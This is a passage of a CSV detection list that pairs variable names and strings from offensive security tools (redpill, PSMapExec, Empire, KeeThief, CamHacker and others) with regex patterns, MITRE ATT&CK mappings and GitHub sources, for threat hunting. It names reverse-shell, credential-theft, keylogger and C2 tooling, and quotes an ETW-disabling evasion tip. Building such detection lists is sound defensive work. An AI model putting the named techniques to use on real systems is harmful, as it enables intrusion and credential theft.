TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3958" "*$EmptyPasswordUsers*",".{0,1000}\$EmptyPasswordUsers.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","3960" 
"*$EncodedCommandExfil*",".{0,1000}\$EncodedCommandExfil.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3961" "*$env:COMPlus_ETWEnabled=0*",".{0,1000}\$env\:COMPlus_ETWEnabled\=0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","3962" "*$env:TEMP\winkeykey.txt*",".{0,1000}\$env\:TEMP\\winkeykey\.txt.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3964" "*$Env:TMP\Camera.ps1*",".{0,1000}\$Env\:TMP\\Camera\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3965" "*$Env:TMP\GetLogs.ps1*",".{0,1000}\$Env\:TMP\\GetLogs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3966" "*$env:TMP\Leaked.txt*",".{0,1000}\$env\:TMP\\Leaked\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3967" "*$Env:TMP\Screenshot.ps1*",".{0,1000}\$Env\:TMP\\Screenshot\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - 
T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3968" "*$Env:TMP\StartWebServer.ps1*",".{0,1000}\$Env\:TMP\\StartWebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3969" "*$Env:TMP\Start-WebServer.ps1*",".{0,1000}\$Env\:TMP\\Start\-WebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3970" "*$Env:TMP\tdfr.log*",".{0,1000}\$Env\:TMP\\tdfr\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration 
tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3971" "*$Env:TMP\Upload.ps1*",".{0,1000}\$Env\:TMP\\Upload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3972" "*$Env:TMP\webserver.ps1.ps1*",".{0,1000}\$Env\:TMP\\webserver\.ps1\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3973" "*$fct = Get-Content -Encoding byte -Path *",".{0,1000}\$fct\s\=\sGet\-Content\s\-Encoding\sbyte\s\-Path\s.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","#content","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","3974" "*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*",".{0,1000}\$FilterArgs\s\=\s\@\{\sname\=\'Notion\'.{0,1000}EventNameSpace\=\'root\\\\CimV2\'.{0,1000}QueryLanguage\=.{0,1000}WQL.{0,1000}\sQuery\=.{0,1000}SELECT\s.{0,1000}\sFROM\s__InstanceModificationE.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","3975" "*$ForensikeFolder*",".{0,1000}\$ForensikeFolder.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","3976" "*$FQDNDomainPlusAccountOperators*",".{0,1000}\$FQDNDomainPlusAccountOperators.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3977" "*$FQDNDomainPlusDomainAdmins*",".{0,1000}\$FQDNDomainPlusDomainAdmins.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3978" "*$FQDNDomainPlusEnterpriseAdmins*",".{0,1000}\$FQDNDomainPlusEnterpriseAdmins.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3979" "*$FQDNDomainPlusServerOperators*",".{0,1000}\$FQDNDomainPlusServerOperators.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3980" "*$Green Infecting html file*",".{0,1000}\$Green\sInfecting\shtml\sfile.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #content","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","3981" "*$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp*",".{0,1000}\$Hc2\$w\$c\$rQW\$d\$s\$w\$b\$Hc2\$v\$xZp\$f\$w\$V9z\$rQW\$L\$U\$xZp.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","3982" "*$HidePayload*",".{0,1000}\$HidePayload.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","3983" "*$HOME/.tunneler*",".{0,1000}\$HOME\/\.tunneler.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","3984" "*$InsecureResourceDelegations*",".{0,1000}\$InsecureResourceDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","3986" "*$InsecureTrusteeDelegations*",".{0,1000}\$InsecureTrusteeDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","3987" "*$IPPrintC2*",".{0,1000}\$IPPrintC2.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3988" "*$IPPrintC2.DocumentName*",".{0,1000}\$IPPrintC2\.DocumentName.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3989" 
"*$IPPrintC2.Print*",".{0,1000}\$IPPrintC2\.Print.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3990" "*$KeePassBinaryPath*",".{0,1000}\$KeePassBinaryPath.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3991" "*$KeePassUser*",".{0,1000}\$KeePassUser.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3992" "*$KeePassXMLPath backdoored*",".{0,1000}\$KeePassXMLPath\sbackdoored.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","3993" "*$KeePassXMLPath triggers removed*",".{0,1000}\$KeePassXMLPath\striggers\sremoved.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","3994" "*$Kerberoast*",".{0,1000}\$Kerberoast.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","3995" 
"*$Keylogger=*",".{0,1000}\$Keylogger\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3996" "*$LolDriversVulnerable*",".{0,1000}\$LolDriversVulnerable.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","3997" "*$MimiTickets*",".{0,1000}\$MimiTickets.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3999" "*$myC2ipAdress*",".{0,1000}\$myC2ipAdress.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","4000" "*$myVictimIPAdress*",".{0,1000}\$myVictimIPAdress.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","4001" "*$N0q$x$Hc2$rQW*",".{0,1000}\$N0q\$x\$Hc2\$rQW.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4002" "*$newClass[""__CLASS""] = ""PMEClass""*",".{0,1000}\$newClass\[\""__CLASS\""\]\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","4003" "*$parametersConPtyShell*",".{0,1000}\$parametersConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","simple backdoor with anydesk","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","4005" "*$PipeName = ""TestSVC""*",".{0,1000}\$PipeName\s\=\s\""TestSVC\"".{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - 
CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#namedpipe","simple backdoor with anydesk","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","4006" "*$PotentialComputersWithEmptyPassword*",".{0,1000}\$PotentialComputersWithEmptyPassword.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","simple backdoor with anydesk","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","4007" "*$PotentialUsersWithEmptyPassword*",".{0,1000}\$PotentialUsersWithEmptyPassword.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","simple backdoor with anydesk","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","4008" "*$PowerpreterURL*",".{0,1000}\$PowerpreterURL.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","simple backdoor with anydesk","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4009" "*$PSAmsiScanRequests*",".{0,1000}\$PSAmsiScanRequests.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#content","simple backdoor with anydesk","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","4010" 
"*$ransomNoteBase64*",".{0,1000}\$ransomNoteBase64.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","4011" "*$RESOCKS_KEY*",".{0,1000}\$RESOCKS_KEY.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","4012" "*$RunasCsBase64*",".{0,1000}\$RunasCsBase64.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense 